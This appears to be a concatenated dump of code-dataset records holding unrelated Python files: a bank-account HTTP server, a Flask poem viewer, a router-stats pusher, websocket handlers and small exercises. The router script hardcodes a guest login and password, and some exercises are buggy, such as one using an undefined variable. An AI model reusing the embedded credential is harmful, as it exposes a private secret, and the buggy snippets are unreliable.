path to the user accounts info file from database index file. Return path or None.\n :return: path or empty string\n \"\"\"\n file_path = \"\"\n with open(self.index, 'r') as index_file:\n for row in csv.reader(index_file):\n if row[0] == self.username:\n file_path = os.path.join(self.database_path, row[1])\n break\n if os.path.isfile(file_path):\n return file_path\n else:\n return \"\"\n\n def get_user_accounts(self, mode):\n \"\"\"\n Open file self.get_user_accounts_path and return corresponding file object.\n If self.get_user_accounts_path return None, this function return None too.\n :param mode: have the same meaning as in built-in function open()\n :return: file object or None\n \"\"\"\n file_path = self.get_user_accounts_path()\n if file_path != \"\":\n return open(file_path, mode)\n else:\n return None\n\n def create_new_account(self, param_dict):\n \"\"\"\n Crete new account with currency param_dict['currency']\n :param param_dict: dictionary {'login': str, 'currency': str}\n :return: REQUEST_RESULT_* constant\n \"\"\"\n if 'currency' not in param_dict:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n currency = param_dict['currency']\n\n accounts_file_path = self.get_user_accounts_path()\n if accounts_file_path == \"\":\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_OR_DATABASE_ERROR\n with open(accounts_file_path, 'r') as file:\n accounts = json.load(file)\n\n acc_number_lst = []\n for acc in accounts:\n acc_number_lst.append(int(acc))\n acc_number_lst.sort()\n\n if len(acc_number_lst) != 0:\n new_account_number = acc_number_lst[-1] + 1\n if new_account_number > 999:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_DATABASE_ERROR\n else:\n new_account_number = 1\n\n accounts[str(new_account_number).rjust(3, '0')] = {'currency': currency, 'amount': 0.0}\n with open(accounts_file_path, 'w') as file:\n json.dump(accounts, file)\n return UserDatabaseHandler.REQUEST_RESULT_OK\n\n def action_on_account(self, param_dict):\n \"\"\"\n Perform action param_dict['account-action'] (deposit/withdraw) on account\n witch number is param_dict['account-number'] and which belongs to the user param_dict['login']\n :param param_dict: dictionary {'login': str, 'account-number': str, 'amount': str, 'account-action': str}\n :return: REQUEST_RESULT_* constant\n \"\"\"\n if 'account-number' not in param_dict:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n if 'account-action' not in param_dict:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n if 'amount' not in param_dict:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n\n number = param_dict['account-number']\n action = param_dict['account-action']\n amount_for_action = round(float(param_dict['amount']), 2)\n\n accounts_file_path = self.get_user_accounts_path()\n if accounts_file_path == \"\":\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_OR_DATABASE_ERROR\n with open(accounts_file_path, 'r') as file:\n accounts = json.load(file)\n\n if number not in accounts:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_DATABASE_ERROR\n acc = accounts[number]\n if 'amount' not in acc:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_DATABASE_ERROR\n amount_in_account = acc['amount']\n\n if action == 'deposit':\n amount_in_account += amount_for_action\n elif action == 'withdraw':\n if amount_in_account >= amount_for_action:\n amount_in_account -= amount_for_action\n else:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_INSUFFICIENT_FUNDS\n else:\n return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_UNSUPPORTED_ACTION\n\n with open(accounts_file_path, 'w') as file:\n acc['amount'] = round(amount_in_account, 2)\n json.dump(accounts, file)\n return UserDatabaseHandler.REQUEST_RESULT_OK\n\n\ndef run(server_class=ThreadingHTTPServer, handler_class=AbcHTTPRequestHandler):\n server_address = ('localhost', 8080)\n httpd = server_class(server_address, handler_class)\n print(\"Python system version:\", handler_class.sys_version)\n print(\"Server version:\", handler_class.server_version)\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"abc_server.py","file_name":"abc_server.py","file_ext":"py","file_size_in_byte":12337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"264989943","text":"class ResultSaved():\n\tdef __init__(self):\n\t\tself.Name \t\t=''\n\t\tself.amount_Column\t=1\n\tdef Saved(self):\n\t\tcode=open('main.f08','a')\n\t\tcode.write(\"\topen(30,file='\"+self.Name+\".csv')\\n\")\n\t\tcode.write(\"\t\twrite(30,*)' NO3 NO2 NO N2O N2 S2 Sul SO4 X_Mox X_Mred X_VSS'\\n\")\n\t\tcode.write('\t\twrite(30,\"('+str(self.amount_Column)+'f20.10)\")'+self.Name+'\\n')\n\t\tcode.write('\tclose(30)\\n\\n')\n\t\tcode.close()","sub_path":"sludge/tests/ResultSave_old.py","file_name":"ResultSave_old.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"219274057","text":"from flask import Flask, render_template\nimport requests\nimport random\n\napp = Flask(__name__)\napp.debug = True\n\ndef get_data():\n\turl = \"https://raw.githubusercontent.com/ischurov/dj-prog/master/pushkin1.json\"\n\tr = requests.get(url)\n\treturn r.json()\n\ndef get_poems_list(json):\n poems = json['poems']\n poems_list = []\n for i in range(len(poems)):\n title = poems[i]['title'][0]\n if title == \"* * *\":\n title = poems[i]['verses'][0]\n year = poems[i]['year']\n if title[-1] == \",\":\n title = title.replace(\",\", \"\")\n if title.isupper != True:\n title = title.upper()\n title = title.strip()\n string = \"{0}, {1}\".format(title, year)\n poems_list.append(string)\n return poems_list\n\n\n@app.route('/')\ndef poems_list():\n\treturn render_template(\"poems_list.html\", data = get_poems_list(get_data()))\n\n@app.route('/poem/<int:n>')\ndef show_poem(n):\n raw_data = get_data()\n data = raw_data['poems']\n poem = data[n - 1]\n return render_template(\"poem.html\", div = poem, n = n)\n\n@app.route('/random')\ndef show_random():\n rand_number = random.randrange(0, 231, 1)\n raw_data = get_data()\n data = raw_data['poems']\n rand_poem = data[rand_number]\n return render_template(\"random.html\", div = rand_poem)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"pushkin.py","file_name":"pushkin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442583806","text":"def classifica_lista(lista):\n if len(lista)<2:\n return 'nenhum'\n y = lista[1]-lista[0]\n if w>0:\n for i in range (len(lista)-1):\n if lista[i]-lista[i+1]<=0:\n return 'nenhum'\n if w<0:\n for i in range (len(lista)-1):\n if lista[i]-lista[i+1]>=0:\n return 'nenhum'\n if w==0:\n return 'nenhum'\n elif w>0:\n return 'crescente'\n elif w<0:\n return 'decrescente'","sub_path":"backup/user_022/ch151_2020_04_13_19_40_39_601011.py","file_name":"ch151_2020_04_13_19_40_39_601011.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"651882968","text":"#!/usr/bin/env python3\r\n\"\"\"Continuous bayesian inference\"\"\"\r\n\r\n\r\nfrom scipy import math, special\r\n\r\n\r\ndef posterior(x, n, p1, p2):\r\n \"\"\"Continuous bayesian inference\"\"\"\r\n if type(n) is not int or n <= 0:\r\n raise ValueError(\"n must be a positive integer\")\r\n if type(x) is not int or x < 0:\r\n raise ValueError(\"x must be a positive integer\")\r\n if x > n:\r\n raise ValueError(\"x cannot be greater than n\")\r\n if type(p1) is not float or p1 < 0 or p1 > 1:\r\n raise ValueError(\"p1 must be a float in the range [0, 1]\")\r\n if type(p2) is not float or p2 < 0 or p2 > 1:\r\n raise ValueError(\"p2 must be a float in the range [0, 1]\")\r\n if p2 <= p1:\r\n raise ValueError(\"p2 must be greater than p1\")\r\n return None\r\n","sub_path":"math/0x07-bayesian_prob/100-continuous.py","file_name":"100-continuous.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469658970","text":"# 500小时粤语导出\n# author:zhaowenhua, date:2019-10-09\n\nimport os\nimport subprocess\nimport shutil\nfrom collections import defaultdict\n\n\ndef mkdir_if_not_exists(filepath):\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n\n\ndef check(src):\n # 检查wav和textgrid是否成对出现\n names = defaultdict(list)\n for path, dirs, filenames in os.walk(src):\n for filename in filenames:\n name, _ = os.path.splitext(os.path.join(path, filename))\n names[name].append(filename)\n errors = []\n for name, contents in names.items():\n if len(contents) != 2:\n errors.append(name)\n\n if len(errors) > 0:\n print(errors)\n raise NameError\n\n\ndef rename(src, dst):\n # 客户重命名\n for path, dirs, filenames in os.walk(src):\n for filename in filenames:\n if not filename.endswith('.TextGrid'):\n continue\n dirname = os.path.basename(path)\n new_name = dirname + '_' + filename\n src_path = os.path.join(path, filename)\n if not filename.startswith('0'):\n dst_path = os.path.join(dst, os.path.relpath(path, src), new_name)\n else:\n dst_path = os.path.join(dst, os.path.relpath(path, src), filename)\n mkdir_if_not_exists(os.path.dirname(dst_path))\n # 转换格式\n # transform(src_path, dst_path)\n shutil.copy(src_path.replace('.TextGrid', '.TextGrid'), dst_path.replace('.TextGrid', '.TextGrid'))\n\n\n\ndef transform(src, dst):\n cmd_line = u'bin/ffmpeg.exe -i \"{src}\" -ar 16k -ac 1 -y \"{dst}\"'.format(src=src, dst=dst)\n try:\n subprocess.check_call(cmd_line, shell=False, stderr=open(os.devnull, 'w'))\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n src = r'C:\\Users\\Aorus\\Desktop\\500小时粤语自然对话生成textgrid\\第一次交付'\n dst = r'\\\\10.10.8.123\\500小时粤语自然对话语音采集\\交付数据\\1011\\500人粤语返工\\500人粤语返工\\返工交付第一批'\n check(dst)\n # rename(src, dst)","sub_path":"yueyuexport.py","file_name":"yueyuexport.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546317205","text":"import asyncio\nimport requests\nimport json\n\n\ndef construct_data_for_prometheus(data):\n def construct_for_field(field, type, help, value):\n if field in data:\n return f\"# TYPE {field} {type}\\n# HELP {field} {help}\\n{field} {value}\\n\"\n return \"\"\n\n s = \"\"\n s += construct_for_field(\n \"manual_memory_avail_bytes\",\n \"gauge\",\n \"RAM bytes available.\",\n data[\"manual_memory_avail_bytes\"],\n )\n s += construct_for_field(\n \"manual_uptime\",\n \"gauge\",\n \"RAM bytes available.\",\n data[\"manual_uptime\"],\n )\n return s\n\n\ndef json_from_everything(everything):\n s = everything.decode().replace(\"'\", '\"')\n s = s.replace(\"\\t\", \"\")\n s = s.replace(\"\\n\", \"\")\n s = s.replace(\",}\", \"}\")\n s = s.replace(\",]\", \"]\")\n return json.loads(s)\n\n\ndef http_importer(ip):\n # Netis n4 (https://4pda.to/forum/index.php?showtopic=1031030&st=40)\n # RAM: 64Mb\n resp = requests.get(\n f\"http://{ip}/cgi-bin/skk_get.cgi\",\n auth=requests.auth.HTTPDigestAuth(\"guest\", \"!watr00shka4ever\"),\n )\n j = json_from_everything(resp.content)\n return {\n \"manual_memory_avail_bytes\": 64\n * 1024\n * 1024\n * (100 - int(j[\"mem\"][:-1]))\n / 100,\n \"manual_uptime\": j[\"system_uptime\"],\n }\n\n\nasync def minutely():\n while True:\n d = construct_data_for_prometheus(http_importer(\"192.168.1.254\"))\n url = \"http://192.168.1.19/pushgateway/metrics/job/manual/instance/netis-n4\"\n try:\n r = requests.post(url, data=d)\n except:\n pass\n print(r.status_code, r.text)\n await asyncio.sleep(60)\n\n\ndef stop():\n task.cancel()\n\n\nloop = asyncio.get_event_loop()\ntask = loop.create_task(minutely())\n\ntry:\n loop.run_until_complete(task)\nexcept asyncio.CancelledError:\n pass\n","sub_path":"termux/stat_importer.py","file_name":"stat_importer.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51880159","text":"from statistics.statistic import Statistic\nfrom statistics.statisticrepository import StatisticRepository\n\nfrom utils import arrayToJson\n\nclass StatisticController():\n def __init__(self, connection):\n\n self.connection = connection \n self.repo = StatisticRepository(connection)\n\n def getInfoByCourseId(self, courseID):\n p = self.repo.findByCourseId(courseID)\n\n return arrayToJson(p,\"statistics\")\n\n def update(self,variabile_conditie,valori_conditie,variabile_put,valori_put):\n\n if \"courseID\" in variabile_put:\n return b'{\"code\":\"405\",\"result\":{\"error\":\"Interdictie modificare date\"}}'\n\t\t\n result = self.repo.update(variabile_conditie,valori_conditie,variabile_put,valori_put)\n\n if result == -1:\n return b'{\"code\":\"404\",\"result\":{\"error\":\"Statistica inexistenta\"}}'\n else:\n return b'{\"code\":\"200\",\"result\":{\"error\":\"none\"}}'","sub_path":"server/statistics/statisticcontroller.py","file_name":"statisticcontroller.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292945026","text":"# pylint: disable=missing-docstring, global-statement, invalid-name\n#\n# Copyright (C) 2017 Jonas Colmsjö, Claes Strannegård\n#\n\n\n# Imports\n# ======\n\nimport unittest\n\nfrom sea import Sea\nfrom agents import Agent\nfrom agents import Obstacle\nfrom myutils import Logging\n\n\n# Setup logging\n# =============\n\nDEBUG_MODE = True\nl = Logging('test_cachalot', DEBUG_MODE)\n\n\n# Unit tests\n# ==========\n\nlane = ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\\n' +\n 'wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww\\n' +\n 'wwwwwsssswwwwwwwwwwwwwwwwwwwwwwwwwwsssswwwwwwwwwww\\n')\n\n# the mother and calf have separate and identical lanes\nworld = lane + lane + 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'\n\noptions = {\n 'world': [x for x in world.split(\"\\n\")]\n}\n\nclass TestCachalot(unittest.TestCase):\n\n def setUp(self):\n l.info('Testing cachalot...')\n\n def test_add_squid(self):\n l.info('test_add_squid')\n\n sea = Sea(options)\n\n for i in range(5, 4):\n self.assertTrue(len(sea.list_things_at((i, 2))) == 1)\n self.assertTrue(len(sea.list_things_at((i, 5))) == 1)\n\n for i in range(0, 50):\n self.assertTrue(isinstance(sea.list_things_at((i, 3))[0], Obstacle))\n\n\n def test_moving_cachalot(self):\n l.info('test_moving_cachalot')\n\n e = Sea(options)\n a = Agent()\n e.add_thing(a, (1, 1))\n\n self.assertTrue(a.location == (1, 1))\n e.execute_action(a, 'DiveAndForward', 1)\n self.assertTrue(a.location == (2, 2))\n\n # Should hit the wall\n e.execute_action(a, 'DiveAndForward', 1)\n self.assertTrue(a.location == (3, 2))\n\n e.execute_action(a, 'Forward', 1)\n self.assertTrue(a.location == (4, 2))\n\n e.execute_action(a, 'UpAndforward', 1)\n self.assertTrue(a.location == (5, 1))\n\n # check that the world is torus, should get back to the same location\n for _ in range(0, 50):\n e.execute_action(a, 'Forward', 1)\n\n self.assertTrue(a.location == (5, 1))\n\n def test_singing_cachalot(self):\n l.info('test_singing_cachalot')\n\n e = Sea(options)\n a = Agent()\n e.add_thing(a, (1, 1))\n\n # song at time=1 will be heard by other agents at time=2\n e.execute_ns_action(a, 'sign', 1)\n self.assertTrue(len(e.list_ns_artifacts_at(2)) == 1)\n\n\n def tearDown(self):\n l.info('...done with test_sea.')\n\n\n# Main\n# ====\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cachalot/test/test_sea.py","file_name":"test_sea.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"277369398","text":"import sys\nsys.stdin = open('input.txt','r')\n\nN, M = map(int,input().split())\nmap = []\nfor i in range(N):\n l = input()\n templ = []\n for j in range(M):\n templ.append(l[j])\n map.append(templ)\n# for a in map: print(*a)\n\ndef check(i,j,li):\n global broken\n for c in li:\n if c == '1' :\n if map[i-1][j] == '.':\n broken.append([(i-1,j),i,j])\n elif c == '2' :\n if map[i][j+1] == '.':\n broken.append([(i,j+1),i,j])\n elif c == '3' :\n if map[i+1][j] == '.':\n broken.append([(i+1,j),i,j])\n elif c == '4' :\n if map[i][j-1] == '.':\n broken.append([(i,j-1),i,j])\n\nbroken = []\nfor i in range(N):\n for j in range(M):\n point = map[i][j]\n if point == chr(124) : check(i,j,['1','3'])\n elif point == '-' : check(i,j,['2','4'])\n elif point == '+' : check(i,j,['1','2','3','4'])\n elif point == '1' : check(i,j,['2','3'])\n elif point == '2' : check(i,j,['1','2'])\n elif point == '3' : check(i,j,['1','4'])\n elif point == '4' : check(i,j,['3','4'])\n\n# print(broken)\nfix = set()\ndi, dj = [-1,0,1,0],[0,1,0,-1]\nbi, bj = broken[0][0][0],broken[0][0][1]\nif len(broken) == 4:\n print(bi,bj,'+')\nelse:\n for d in range(4):\n ci, cj = bi+di[d] , bj+dj[d]\n if 0 <= ci < N and 0 <= cj < M :\n for cij in broken:\n if cij[1] == ci and cij[2] == cj :\n fix.add(d+1)\n# print(fix)\nif fix == {1,3} : print(bi+1,bj+1,chr(124))\nelif fix == {2,4} : print(bi+1,bj+1,'-')\nelif fix == {2,3} : print(bi+1,bj+1,1)\nelif fix == {1,2} : print(bi+1,bj+1,2)\nelif fix == {1,4} : print(bi+1,bj+1,3)\nelif fix == {3,4} : print(bi+1,bj+1,4)","sub_path":"ForNovTest/BeakJoon/2931.py","file_name":"2931.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102063556","text":"import sys, math\nfrom collections import defaultdict as dd\n\ndef mean(scores):\n total = 0.0\n for score in scores:\n total += score\n return total * 1.0 /len(scores)\n\ndef variance(scores, mu):\n sigma = 0\n for score in scores:\n sigma += math.pow(score-mu,2)\n return math.sqrt(sigma*1.0/len(scores))\n\nclass perUserStats:\n def __init__(self):\n self._userWise = dd(list)\n self._tweets = []\n self._scores = []\n self._correct = []\n self._mean = dd(float)\n self._variance = dd(float)\n \n def classScore(self, score):\n score = float(score)\n if score > 0:\n return '1'\n else:\n return '-1'\n \n def loadScores(self, scoredTweets, userIds):\n self._scores = [float(s.strip().split('\\t')[1]) for s in open(scoredTweets)]\n self._tweets = ['\\t'.join(s.strip().split('\\t')[3:]) for s in open(scoredTweets)]\n self._correct = map(lambda x:x[0]==self.classScore(x[1]),[s.strip().split('\\t')[:2] for s in open(scoredTweets)])\n ids = [i.strip().split('\\t')[0] for i in open(userIds)]\n for index in range(len(self._scores)):\n self._userWise[ids[index]].append((self._tweets[index],self._scores[index], self._correct[index]))\n\n def meanAnalysis(self, outputFile):\n outputFile = open(outputFile,'w')\n for user in self._userWise.iterkeys():\n totalOutside = 0\n userMean = mean(map(lambda x:x[1],self._userWise[user]))\n userVar = variance(map(lambda x:x[1], self._userWise[user]), userMean)\n userPos = []\n userNeg = []\n userMid = []\n sys.stderr.write(\"User Mean:\"+str(userMean)+\"\\t User Variance:\"+str(userVar)+'\\n') \n for (tweet,score,correct) in self._userWise[user]:\n if not correct:\n continue\n if score > userMean + 2*userVar:\n userPos.append(tweet)\n totalOutside += 1\n if score < userMean - 2 * userVar:\n userNeg.append(tweet)\n totalOutside += 1\n if (score > userMean and score < userMean + 0.5*userVar) or (score < userMean and score > userMean - 0.5*userVar):\n userMid.append(tweet)\n \n outputFile.write('-'*60+'\\n')\n outputFile.write(\"User Id:\" + str(user)+ \" has \" + str(totalOutside) + \" tweets outside of 2 StDs out of \" + str(len(self._userWise[user]))+'\\n')\n outputFile.write('-'*60+'\\n\\n')\n outputFile.write('Positive(AAE):\\n')\n outputFile.write('\\n'.join(userPos)+'\\n\\n')\n outputFile.write('Middle:\\n')\n outputFile.write('\\n'.join(userMid[:5])+'\\n\\n')\n outputFile.write('Negative(MSE):\\n')\n outputFile.write('\\n'.join(userNeg)+'\\n\\n')\n outputFile.close()\n \nif __name__ == \"__main__\":\n scoredTweets = \"/usr0/home/pgadde/Work/Ethnic/AAEness/Exp/Social/Users/Data/annotatedTweets.tsv.scored\"\n userIds = \"/usr0/home/pgadde/Work/Ethnic/AAEness/Exp/Social/Users/Data/tweetsCleaned.txt\"\n outputFile = \"/usr0/home/pgadde/Work/Ethnic/AAEness/Exp/Social/Users/Data/perUserStats.txt\"\n P = perUserStats()\n P.loadScores(scoredTweets, userIds)\n P.meanAnalysis(outputFile) \n","sub_path":"EthnicGroups/src/SocialContexts/perUserStats.py","file_name":"perUserStats.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497845739","text":"########\n# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n\"\"\"\nHandles all commands that start with 'cfy plugins'\n\"\"\"\nimport tarfile\n\nfrom cloudify_cli import utils\nfrom cloudify_cli import messages\nfrom cloudify_cli.logger import get_logger\nfrom cloudify_cli.utils import print_table\nfrom cloudify_cli.exceptions import CloudifyCliError\n\n\ndef validate(plugin_path):\n logger = get_logger()\n\n logger.info(\n messages.VALIDATING_PLUGIN.format(plugin_path.name))\n if not tarfile.is_tarfile(plugin_path.name):\n raise CloudifyCliError('Archive {0} is of an unsupported archive type.'\n ' Only tar.gz is allowed'\n .format(plugin_path.name))\n with tarfile.open(plugin_path.name, 'r') as tar:\n tar_members = tar.getmembers()\n package_json_path = '{0}/package.json'.format(tar_members[0].name)\n try:\n package_member = tar.getmember(package_json_path)\n except KeyError:\n raise CloudifyCliError(messages.VALIDATING_PLUGIN_FAILED\n .format(plugin_path, 'package.json was not '\n 'found in archive'))\n try:\n tar.extractfile(package_member).read()\n except:\n raise CloudifyCliError(messages.VALIDATING_PLUGIN_FAILED\n .format(plugin_path, 'unable to read '\n 'package.json'))\n\n logger.info(messages.VALIDATING_PLUGIN_SUCCEEDED)\n\n\ndef delete(plugin_id):\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n client = utils.get_rest_client(management_ip)\n\n logger.info(messages.PLUGIN_DELETE.format(plugin_id, management_ip))\n client.plugins.delete(plugin_id)\n\n logger.info(messages.PLUGIN_DELETE_SUCCEEDED.format(plugin_id))\n\n\ndef upload(plugin_path):\n server_ip = utils.get_management_server_ip()\n utils.upload_plugin(plugin_path, server_ip,\n utils.get_rest_client(server_ip), validate)\n\n\ndef download(plugin_id,\n output):\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n logger.info(messages.DOWNLOADING_PLUGIN.format(plugin_id))\n client = utils.get_rest_client(management_ip)\n target_file = client.plugins.download(plugin_id, output)\n logger.info(messages.DOWNLOADING_PLUGIN_SUCCEEDED.format(plugin_id,\n target_file))\n\n\nfields = ['id', 'package_name', 'package_version', 'supported_platform',\n 'distribution', 'distribution_release', 'uploaded_at']\n\n\ndef get(plugin_id):\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n client = utils.get_rest_client(management_ip)\n\n logger.info(messages.PLUGINS_GET.format(plugin_id, management_ip))\n plugin = client.plugins.get(plugin_id, _include=fields)\n\n pt = utils.table(fields, data=[plugin])\n print_table('Plugin:', pt)\n\n\ndef ls():\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n client = utils.get_rest_client(management_ip)\n\n logger.info(messages.PLUGINS_LIST.format(management_ip))\n plugins = client.plugins.list(_include=fields)\n\n pt = utils.table(fields, data=plugins)\n print_table('Plugins:', pt)\n","sub_path":"cloudify_cli/commands/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"370975286","text":"from viewer.settings_common import *\n\nROOT_URL = '/'\nSTATIC_URL_PATH = 'static/'\nSTATIC_URL = ROOT_URL + STATIC_URL_PATH\n\nHOSTNAME = 'viewer.legacysurvey.org'\n#HOSTNAME = 'spin.legacysurvey.org'\nTILE_URL = 'https://{s}.%s%s{id}/{ver}/{z}/{x}/{y}.jpg' % (HOSTNAME, ROOT_URL)\n\nDEBUG = True\n\nDEBUG_LOGGING = True\n\nREAD_ONLY_BASEDIR = True\n\nUSER_QUERY_DIR = '/tmp/viewer-user'\n\nFORCE_SCRIPT_NAME = ROOT_URL\n\nSTATIC_TILE_URL_B = 'http://{s}.imagine.legacysurvey.org/static/tiles/{id}/{ver}/{z}/{x}/{y}.jpg'\nSUBDOMAINS_B = SUBDOMAINS\n\n# no CORS -- so don't use subdomains, or specify hostname (www.legacysurvey.org vs legacysurvey.org)\nCAT_URL = '%s/{id}/{ver}/{z}/{x}/{y}.cat.json' % (ROOT_URL)\n\nENABLE_DR5 = False\nENABLE_DR9 = True\nENABLE_DR9SV = False\nENABLE_OLDER = False\n# public version\nENABLE_SCIENCE = False\n\nENABLE_CUTOUTS = False\nENABLE_SPECTRA = False\nENABLE_DESI_TARGETS = False\n","sub_path":"viewer/settings_pr.py","file_name":"settings_pr.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"207130226","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport yaml as yml\n\n\ndef maintainers(pkgfile, repofile):\n with open(pkgfile) as p, open(repofile) as r:\n pkgs, repo = yml.load(p), yml.load(r)\n\n maints = set()\n for pkg, ver in pkgs.items():\n maints.add((pkg, ver, repo[pkg][ver]['maintainer']))\n return maints\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='print maintainers')\n parser.add_argument('pkgfile', type=str)\n parser.add_argument('repofile', type=str)\n args = parser.parse_args()\n maints = maintainers(args.pkgfile, args.repofile)\n for pkg, ver, maintainer in maints:\n print('%s %s %s' % (pkg, ver, maintainer))\n","sub_path":"komodo/maintainer.py","file_name":"maintainer.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"278814087","text":"import time\nimport json\nimport hashlib\nimport logging\n\nfrom pulsar.apps import ws\nfrom builtins import isinstance\n\nLUX_CONNECTION = 'lux:connection_established'\nLUX_MESSAGE = 'lux:message'\nLUX_ERROR = 'lux:error'\n\nLOGGER = logging.getLogger('lux.sockjs')\n\n\nclass WsClient:\n '''Server side of a websocket client\n '''\n def __init__(self, transport, handler):\n request = transport.handshake\n self.transport = transport\n self.handler = handler\n self.started = time.time()\n self.address = request.get_client_address()\n session_id = request.urlargs.get('session_id')\n if not session_id:\n key = '%s - %s' % (self.address, self.started)\n session_id = hashlib.sha224(key.encode('utf-8')).hexdigest()\n self.session_id = session_id\n request.cache.websocket = self\n transport.on_open(self)\n\n def __str__(self):\n return '%s - %s' % (self.address, self.session_id)\n\n def __call__(self, channel, message):\n message = message.decode('utf-8')\n self.write(LUX_MESSAGE, channel, message)\n\n # Lux Implementation\n def write(self, event, channel=None, data=None, **kw):\n msg = {'event': event}\n if channel:\n msg['channel'] = channel\n if kw:\n if data:\n data.update(kw)\n else:\n data = kw\n if data:\n if not isinstance(data, str):\n data = json.dumps(data)\n msg['data'] = data\n array = [json.dumps(msg)]\n self.transport.write('a%s' % json.dumps(array))\n\n def error_message(self, ws, exc):\n msg = {'event': LUX_ERROR}\n code = getattr(exc, 'code', None)\n if code:\n msg['code'] = code\n msg['message'] = str(exc)\n\n\nclass LuxWs(ws.WS):\n '''Lux websocket\n '''\n pubsub = None\n\n def on_open(self, websocket):\n ws = WsClient(websocket, self)\n if self.pubsub:\n self.pubsub.add_client(ws)\n app = websocket.app\n app.fire('on_websocket_open', websocket, self)\n #\n # Send the LUX_CONNECTION event with socket id and start time\n ws.write(LUX_CONNECTION, socket_id=ws.session_id, time=ws.started)\n\n def on_message(self, websocket, message):\n ws = websocket.handshake.cache.websocket\n try:\n msg = json.loads(message)\n\n except Exception as exc:\n ws.error_message(exc)\n\n def on_close(self, websocket):\n ws = websocket.handshake.cache.websocket\n if self.pubsub:\n self.pubsub.remove_client(ws)\n LOGGER.info('closing socket %s', ws)\n","sub_path":"lux/extensions/sockjs/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"316863943","text":"from typing import Union\nimport numpy as np\nimport torch\nfrom torchvision.ops import nms\n\nfrom face_detection.Config import cig\nfrom face_detection.utils.bbox import to_offsets, bbox_iou, to_real_bbox\n\ndef safe_to_numpy(data : Union[np.ndarray, torch.Tensor]) -> np.ndarray:\n if isinstance(data, np.ndarray):\n return data\n if isinstance(data, torch.Tensor):\n return data.detach().cpu().numpy()\n\ndef safe_to_tensor(data : Union[np.ndarray, torch.Tensor], use_cuda : bool = cig.use_cuda) -> torch.Tensor:\n if isinstance(data, np.ndarray):\n tensor = torch.from_numpy(data)\n if isinstance(data, torch.Tensor):\n tensor = data.detach()\n if use_cuda:\n tensor = tensor.cuda()\n return tensor\n\nclass ProposalTargetCreator(object):\n def __init__(self,\n n_sample=128,\n pos_ratio=0.25, pos_iou_thresh=0.5,\n neg_iou_thresh_hi=0.5, neg_iou_thresh_lo=0.0\n ):\n self.n_sample = n_sample # number of the bbox left\n 